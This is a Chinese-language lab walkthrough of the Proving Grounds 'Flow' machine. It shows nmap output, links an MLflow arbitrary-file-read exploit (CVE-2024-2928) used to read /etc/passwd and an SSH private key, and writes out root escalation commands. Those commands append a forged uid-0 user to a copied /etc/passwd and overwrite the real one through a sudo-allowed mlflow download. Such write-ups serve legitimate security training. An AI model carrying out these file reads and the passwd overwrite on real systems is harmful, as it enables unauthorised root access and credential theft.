nmap 
nmap -p- -A -T4 -sS 192.168.114.104

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-07 03:03 UTC

Nmap scan report for 192.168.114.104

Host is up (0.072s latency).

Not shown: 65533 filtered tcp ports (no-response)

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)

|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)

5000/tcp open  upnp?

| fingerprint-strings:

|   GenericLines:

|     HTTP/1.1 400 Bad Request

|     Connection: close

|     Content-Type: text/html

|     Content-Length: 193

|     <html>

|     <head>

|     <title>Bad Request</title>

|     </head>

|     <body>

|     <h1><p>Bad Request</p></h1>

|     Invalid Request Line 'Invalid HTTP request line: '''

|     </body>

|     </html>

|   GetRequest:

|     HTTP/1.0 200 OK

|     Server: gunicorn

|     Date: Tue, 07 Jan 2025 03:05:01 GMT

|     Connection: close

|     Content-Disposition: inline; filename=index.html

|     Content-Type: text/html; charset=utf-8

|     Content-Length: 615

|     Last-Modified: Mon, 02 Sep 2024 10:04:33 GMT

|     Cache-Control: no-cache

|     ETag: "1725271473.9912164-615-3603372807"

|     <!doctype html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><link rel="shortcut icon" href="./static-files/favicon.ico"/><meta name="theme-color" content="#000000"/><link rel="manifest" href="./static-files/manifest.json"/><title>MLflow</title><script defer="defer" src="static-files/static/js/main.4dd3381c.js"></script><link href="static-files/static/css/main.6d30cbb0.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><di

|   HTTPOptions:

|     HTTP/1.0 200 OK

|     Server: gunicorn

|     Date: Tue, 07 Jan 2025 03:05:16 GMT

|     Connection: close

|     Content-Type: text/html; charset=utf-8

|     Allow: HEAD, OPTIONS, GET

|     Content-Length: 0

|   RTSPRequest:

|     HTTP/1.1 400 Bad Request

|     Connection: close

|     Content-Type: text/html

|     Content-Length: 196

|     <html>

|     <head>

|     <title>Bad Request</title>

|     </head>

|     <body>

|     <h1><p>Bad Request</p></h1>

|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''

|     </body>

|_    </html>

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port5000-TCP:V=7.94SVN%I=7%D=1/7%Time=677C99DD%P=x86_64-pc-linux-gnu%r(

SF:GenericLines,11E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20

SF:close\r\nContent-Type:\x20text/html\r\nContent-Length:\x20193\r\n\r\n<h

SF:tml>\n\x20\x20<head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x

SF:20\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p

SF:></h1>\n\x20\x20\x20\x20Invalid\x20Request\x20Line\x20'Invalid\x20

SF:HTTP\x20request\x20line:\x20'''\n\x20\x20</body>\n</html

SF:>\n")%r(GetRequest,3A5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r

SF:\nDate:\x20Tue,\x2007\x20Jan\x202025\x2003:05:01\x20GMT\r\nConnection:\

SF:x20close\r\nContent-Disposition:\x20inline;\x20filename=index\.html\r\n

SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20615\

SF:r\nLast-Modified:\x20Mon,\x2002\x20Sep\x202024\x2010:04:33\x20GMT\r\nCa

SF:che-Control:\x20no-cache\r\nETag:\x20\"1725271473\.9912164-615-36033728

SF:07\"\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\x20chars

SF:et=\"utf-8\"/><meta\x20name=\"viewport\"\x20content=\"width=device-widt

SF:h,initial-scale=1,shrink-to-fit=no\"/><link\x20rel=\"shortcut\x20icon\"

SF:\x20href=\"\./static-files/favicon\.ico\"/><meta\x20name=\"theme-color\

SF:"\x20content=\"#000000\"/><link\x20rel=\"manifest\"\x20href=\"\./static

SF:-files/manifest\.json\"/><title>MLflow</title><script\x20defer=\"defer\

SF:"\x20src=\"static-files/static/js/main\.4dd3381c\.js\"></script><link\x

SF:20href=\"static-files/static/css/main\.6d30cbb0\.css\"\x20rel=\"stylesh

SF:eet\"></head><body><noscript>You\x20need\x20to\x20enable\x20JavaScript\

SF:x20to\x20run\x20this\x20app\.</noscript><div\x20id=\"root\"></div><di")

SF:%r(RTSPRequest,121,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x

SF:20close\r\nContent-Type:\x20text/html\r\nContent-Length:\x20196\r\n\r\n

SF:<html>\n\x20\x20<head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n

SF:\x20\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request<

SF:/p></h1>\n\x20\x20\x20\x20Invalid\x20HTTP\x20Version\x20'Invalid\x

SF:20HTTP\x20Version:\x20'RTSP/1\.0''\n\x20\x20</body>\n</h

SF:tml>\n")%r(HTTPOptions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicor

SF:n\r\nDate:\x20Tue,\x2007\x20Jan\x202025\x2003:05:16\x20GMT\r\nConnectio

SF:n:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x

SF:20HEAD,\x20OPTIONS,\x20GET\r\nContent-Length:\x200\r\n\r\n");

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|specialized|storage-misc

Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3

Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)

HOP RTT      ADDRESS

1   73.06 ms 192.168.45.1

2   73.01 ms 192.168.45.254

3   73.15 ms 192.168.251.1

4   73.14 ms 192.168.114.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 228.37 seconds

发现版本

搜索exp 看样子是个任意文件读取

https://github.com/nuridincersaygili/CVE-2024-2928/blob/main/CVE-2024-2928.py

尝试exp读取/etc/passwd



读取成功

尝试读取id_rsa



读取成功

提权阶段

sudo -l

/usr/local/bin/mlflow artifacts download -u * -d *

发现你sudo 运行这个命令

尝试运行

发现 报错 让我们 mlflow artifacts download --help 看看说明

大概看懂了

-u 指定下载的文件 -d 指定文件下载到哪个目录

这不就简单了

我们直接

先复制一份/etc/passwd

cp /etc/passwd ./passwd

然后将伪造的root用户写入

echo 'xxoo:$1$GWB36/lB$ncfgVGEio6XbCYeV53KcM0:0:0:asdasd:/root:/bin/bash' >> ./passwd

然后

sudo /usr/local/bin/mlflow artifacts download -u ./passwd -d /etc 将我们伪造的passwd 写入/etc目录

提权成功

flow pg walkthrough Intermediate的更多相关文章

  1. 学习笔记之Intermediate Python for Data Science | DataCamp

    Intermediate Python for Data Science | DataCamp https://www.datacamp.com/courses/intermediate-python ...

  2. Spring实战第八章学习笔记————使用Spring Web Flow

    Spring实战第八章学习笔记----使用Spring Web Flow Spring Web Flow是一个Web框架,它适用于元素按规定流程运行的程序. 其实我们可以使用任何WEB框架写流程化的应 ...

  3. Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)

    本文转自:自己的微信公众号<集成电路设计及EDA教程> <Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)>   轻轻走过,悄悄看过,无 ...

  4. [AI] 论文笔记 - CVPR2018 Super SloMo: High Quality Estimation of Multiple Intermediate Frames for Video Interpolation

    写在前面 原始视频(30fps) 补帧后的视频(240fps) 本文是博主在做实验的过程中使用到的方法,刚好也做为了本科毕设的翻译文章,现在把它搬运到博客上来,因为觉得这篇文章的思路真的不错. 这篇文 ...

  5. ICC教程 - Flow系列 - 概念系列 - ECO (理论+实践+脚本分享)

    本文转自:自己的微信公众号<集成电路设计及EDA教程> <ICC教程 - Flow系列 - 概念系列 - ECO (理论+实践+脚本分享)> 这篇推文讲一下数字IC设计中的po ...

  6. Git 在团队中的最佳实践--如何正确使用Git Flow

    我们已经从SVN 切换到Git很多年了,现在几乎所有的项目都在使用Github管理, 本篇文章讲一下为什么使用Git, 以及如何在团队中正确使用. Git的优点 Git的优点很多,但是这里只列出我认为 ...

  7. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  8. [LeetCode] Pacific Atlantic Water Flow 太平洋大西洋水流

    Given an m x n matrix of non-negative integers representing the height of each unit cell in a contin ...

  9. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  10. BZOJ 4390: [Usaco2015 dec]Max Flow

    4390: [Usaco2015 dec]Max Flow Time Limit: 10 Sec  Memory Limit: 128 MBSubmit: 177  Solved: 113[Submi ...

随机推荐

  1. 厉害了,8.7w人打满分!如果我找 BUG 能像他一样厉害就好了!

    你好呀,我是歪歪. 最近在 B 站上看到一个让我觉得"非常哇塞"视频的: https://www.bilibili.com/video/BV1y4421U72G/ 视频的播放量有接 ...

  2. 异步编程在ArkTS中具体怎么实现?

    大家好,我是 V 哥,很好奇,在ArkTS中实现异步编程是怎样的,今天的内容来聊聊这个问题,总结了一些学习笔记,分享给大家,在 ArkTS中实现异步编程主要可以通过以下几种方式: 1. 使用async ...

  3. 功能齐全的 WPF 自定义控件资源库(收藏版)

    前言 推荐一款界面美观.功能齐全的 WPF 自定义控件资源库.这款资源库通过封装一系列常用的控件,简化开发流程,加快项目交付速度. 控件介绍 资源库封装了一些常用的控件,将其整合到一个自定义的控件库中 ...

  4. 使用JConsole监控进程、线程、内存、cpu、类情况

    Jconsole简介: Jconsole是一个JMX兼容的监视工具.它使用Java虚拟机的JMX机制来提供运行在Java平台的应用程序的性能与资源耗费信息. 监控进程使用方法如下:由于JConsole ...

  5. java——棋牌类游戏五子棋(singlewzq1.0)之一

    这是本人最近一段时间写的五子棋的java代码,大体框架都实现了,一些细节还需要优化. package basegame; import java.awt.Color; import java.awt. ...

  6. Cygwin:windows下的Linux系统

    Cygwin是啥?Cygwin是一个可原生运行于Windows系统上的POSXI兼容环境. 是的,我又开新专辑了<零基础swoole学习笔记>.不是我太贪心,而是最近半年和小伙伴一直在用s ...

  7. redis6.0安装与使用

    [Linux] 源码安装: 下载安装 Cd /usr/local/src/ wget https://download.redis.io/releases/redis-6.0.9.tar.gz $ t ...

  8. 第四届河南省 CCPC 大学生程序设计竞赛

    F-集合之和 规定集合A和集合B的加法运算:\(A+B={x+y|x∈A,y∈B}\),设有限数集A中的元素个数为|A|,现给定n,请你构造集合A使得\(|A+A|=n\),如果A不存在,输出-1 题 ...

  9. TesseractOCR-GUI:基于WPF/C#构建TesseractOCR简单易用的用户界面

    前言 前篇文章使用Tesseract进行图片文字识别介绍了如何安装TesseractOCR与TesseractOCR的命令行使用.但在日常使用过程中,命令行使用还是不太方便的,因此今天介绍一下如何使用 ...

  10. 19号CSS学习

    一.CSS的复合选择器 更高效的选择目标元素. 后代选择器.子选择器.并集选择器.伪类选择器等. 1.后代选择器 可以选择父元素里的子元素. 又称包含选择器. 必须是空格,必须是后代,ul li {c ...